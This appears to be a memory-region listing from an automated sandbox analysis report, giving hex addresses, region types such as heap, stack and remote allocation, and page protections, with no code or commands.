3520000
heap
page read and write
238E0000
trusted library allocation
page read and write
238C0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
98000
stack
page read and write
620000
heap
page read and write
5DA000
heap
page read and write
21A74000
trusted library allocation
page read and write
6F00000
heap
page read and write
22C11000
trusted library allocation
page read and write
23910000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
3526000
heap
page read and write
238B0000
trusted library allocation
page read and write
5C9000
heap
page read and write
290E000
stack
page read and write
5B5000
heap
page read and write
238E0000
trusted library allocation
page read and write
775000
heap
page read and write
23920000
trusted library allocation
page read and write
35D000
trusted library allocation
page execute and read and write
5C9000
heap
page read and write
216E0000
heap
page read and write
213B0000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page execute and read and write
3268000
heap
page read and write
215D0000
direct allocation
page read and write
728D000
stack
page read and write
2143F000
stack
page read and write
A4D2000
direct allocation
page execute and read and write
597D000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
2BC0000
trusted library allocation
page execute and read and write
238F0000
trusted library allocation
page read and write
22C24000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
5D5000
heap
page read and write
265F000
stack
page read and write
7380000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
2148D000
stack
page read and write
6E0000
heap
page read and write
408000
unkown
page readonly
238E0000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
5F2000
heap
page read and write
24660000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
5C9000
heap
page read and write
670000
trusted library allocation
page read and write
3B40000
remote allocation
page execute and read and write
239D0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
320B000
heap
page read and write
24660000
trusted library allocation
page read and write
82F7000
heap
page read and write
21905000
trusted library allocation
page read and write
21657000
stack
page read and write
238E0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
77B000
heap
page read and write
23ED0000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
669000
heap
page read and write
6970000
direct allocation
page read and write
23920000
trusted library allocation
page read and write
684E000
stack
page read and write
24630000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5D5000
heap
page read and write
5B5000
heap
page read and write
23920000
trusted library allocation
page read and write
24740000
trusted library allocation
page read and write
6F0000
direct allocation
page read and write
238E0000
trusted library allocation
page read and write
25D0000
heap
page read and write
23ED0000
trusted library allocation
page read and write
22CAF000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
238E1000
trusted library allocation
page read and write
22921000
trusted library allocation
page read and write
7DEE000
stack
page read and write
238F0000
trusted library allocation
page read and write
238F0000
trusted library allocation
page read and write
2AB0000
trusted library section
page read and write
81A2000
heap
page read and write
228B1000
trusted library allocation
page read and write
218DE000
trusted library allocation
page read and write
694D000
stack
page read and write
7350000
trusted library allocation
page read and write
5C5000
heap
page read and write
21A72000
trusted library allocation
page read and write
387000
trusted library allocation
page execute and read and write
5ED000
heap
page read and write
23ED0000
trusted library allocation
page read and write
2137D000
stack
page read and write
23ED0000
trusted library allocation
page read and write
80C0000
direct allocation
page execute and read and write
6E7000
heap
page read and write
6F63000
heap
page read and write
238B0000
trusted library allocation
page read and write
2948000
heap
page read and write
690000
trusted library allocation
page read and write
70A000
heap
page read and write
238C0000
trusted library allocation
page read and write
22C04000
trusted library allocation
page read and write
810000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
3275000
heap
page read and write
470E000
stack
page read and write
23920000
trusted library allocation
page read and write
5D5000
heap
page read and write
9E9000
heap
page read and write
800000
trusted library allocation
page read and write
326C000
heap
page read and write
23890000
trusted library allocation
page read and write
5C5000
heap
page read and write
72C0000
trusted library allocation
page read and write
588000
heap
page read and write
23ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5C1000
heap
page read and write
276F000
heap
page read and write
238E0000
trusted library allocation
page read and write
24640000
trusted library allocation
page read and write
34A0000
heap
page read and write
433000
unkown
page read and write
3323000
heap
page read and write
238E0000
trusted library allocation
page read and write
2760000
heap
page read and write
21999000
trusted library allocation
page read and write
9EC000
heap
page read and write
23EE0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
20E20000
direct allocation
page read and write
353000
trusted library allocation
page execute and read and write
6995000
heap
page execute and read and write
23ED0000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
22D7E000
trusted library allocation
page read and write
6D0000
direct allocation
page read and write
7D70000
trusted library allocation
page execute and read and write
72D0000
trusted library allocation
page read and write
23BE3000
heap
page read and write
22976000
trusted library allocation
page read and write
238F0000
trusted library allocation
page read and write
228F6000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
360000
trusted library allocation
page read and write
21530000
remote allocation
page read and write
8C0D000
stack
page read and write
24660000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
21B38000
trusted library allocation
page read and write
228AB000
trusted library allocation
page read and write
40A000
unkown
page read and write
238E0000
trusted library allocation
page read and write
25AE000
stack
page read and write
2AD3000
trusted library allocation
page execute and read and write
400000
unkown
page readonly
23920000
trusted library allocation
page read and write
74C000
heap
page read and write
24660000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
8570000
heap
page read and write
22C79000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
47C0000
heap
page execute and read and write
2176E000
stack
page read and write
800000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23900000
heap
page execute and read and write
4927000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
2291C000
trusted library allocation
page read and write
2192E000
trusted library allocation
page read and write
2B30000
trusted library allocation
page read and write
390000
trusted library allocation
page execute and read and write
6A0000
trusted library allocation
page read and write
5C9000
heap
page read and write
21B41000
trusted library allocation
page read and write
6EF0000
heap
page execute and read and write
2169E000
stack
page read and write
23920000
trusted library allocation
page read and write
24620000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
24650000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
21A76000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
19A000
stack
page read and write
275F000
stack
page read and write
94F000
stack
page read and write
478D000
stack
page read and write
5978000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
5DA000
heap
page read and write
333F000
heap
page read and write
779000
heap
page read and write
840000
trusted library allocation
page read and write
38B000
trusted library allocation
page execute and read and write
239D0000
trusted library allocation
page read and write
4D70000
heap
page read and write
245DE000
stack
page read and write
7B8000
heap
page read and write
21932000
trusted library allocation
page read and write
42A000
unkown
page read and write
239D0000
trusted library allocation
page read and write
36B0000
heap
page read and write
239C0000
trusted library allocation
page execute and read and write
23E3E000
stack
page read and write
23920000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5C5000
heap
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
24660000
trusted library allocation
page read and write
6F4F000
heap
page read and write
22C4D000
trusted library allocation
page read and write
57F9000
trusted library allocation
page read and write
474C000
stack
page read and write
238E0000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238F0000
trusted library allocation
page read and write
24630000
trusted library allocation
page read and write
9ED000
heap
page read and write
238E0000
trusted library allocation
page read and write
7D55000
stack
page read and write
20E60000
direct allocation
page read and write
238E0000
trusted library allocation
page read and write
326E000
heap
page read and write
22C99000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
2AFA000
trusted library allocation
page execute and read and write
23ED0000
trusted library allocation
page read and write
238C0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
8BCE000
stack
page read and write
23ED0000
trusted library allocation
page read and write
229EB000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
22919000
trusted library allocation
page read and write
2451E000
stack
page read and write
47D1000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
21974000
trusted library allocation
page read and write
228FD000
trusted library allocation
page read and write
6950000
direct allocation
page read and write
212BE000
stack
page read and write
22C35000
trusted library allocation
page read and write
5C1000
heap
page read and write
680E000
stack
page read and write
4EC0000
heap
page read and write
8390000
trusted library allocation
page read and write
7F258000
trusted library allocation
page execute and read and write
2210000
heap
page read and write
22913000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
4FE2000
remote allocation
page execute and read and write
238B0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
60D000
heap
page read and write
6A20000
direct allocation
page read and write
22A86000
trusted library allocation
page read and write
427000
unkown
page read and write
828D000
heap
page read and write
23ED0000
trusted library allocation
page read and write
23920000
trusted library allocation
page read and write
4E0000
heap
page read and write
5DA000
heap
page read and write
238E0000
trusted library allocation
page read and write
2193E000
trusted library allocation
page read and write
8201000
heap
page read and write
6FE9000
heap
page read and write
20E40000
direct allocation
page read and write
238B0000
trusted library allocation
page read and write
3231000
heap
page read and write
36D000
trusted library allocation
page execute and read and write
215AF000
stack
page read and write
690000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
9E5000
heap
page read and write
238E0000
trusted library allocation
page read and write
276E000
heap
page read and write
3275000
heap
page read and write
7300000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
21530000
remote allocation
page read and write
3229000
heap
page read and write
21942000
trusted library allocation
page read and write
213FE000
stack
page read and write
7F00000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
3332000
heap
page read and write
238D0000
heap
page read and write
23920000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
5C9000
heap
page read and write
2A8E000
stack
page read and write
23920000
trusted library allocation
page read and write
6A10000
direct allocation
page read and write
6980000
direct allocation
page read and write
21A45000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
21B87000
trusted library allocation
page read and write
5C1000
heap
page read and write
24740000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page execute and read and write
23C0D000
heap
page read and write
6F1A000
heap
page read and write
24630000
trusted library allocation
page read and write
8170000
heap
page read and write
6A0000
trusted library allocation
page read and write
21880000
heap
page read and write
6990000
heap
page execute and read and write
23910000
trusted library allocation
page read and write
5DA000
heap
page read and write
8160000
heap
page read and write
23930000
heap
page read and write
2A4E000
stack
page read and write
238C0000
trusted library allocation
page read and write
21856000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
23ED0000
trusted library allocation
page read and write
23BB8000
heap
page read and write
24660000
trusted library allocation
page read and write
239D0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
2910000
heap
page read and write
23ED0000
trusted library allocation
page read and write
610000
heap
page readonly
239D0000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
382000
trusted library allocation
page read and write
238E0000
trusted library allocation
page read and write
There are 1005 hidden memdumps, click here to show them.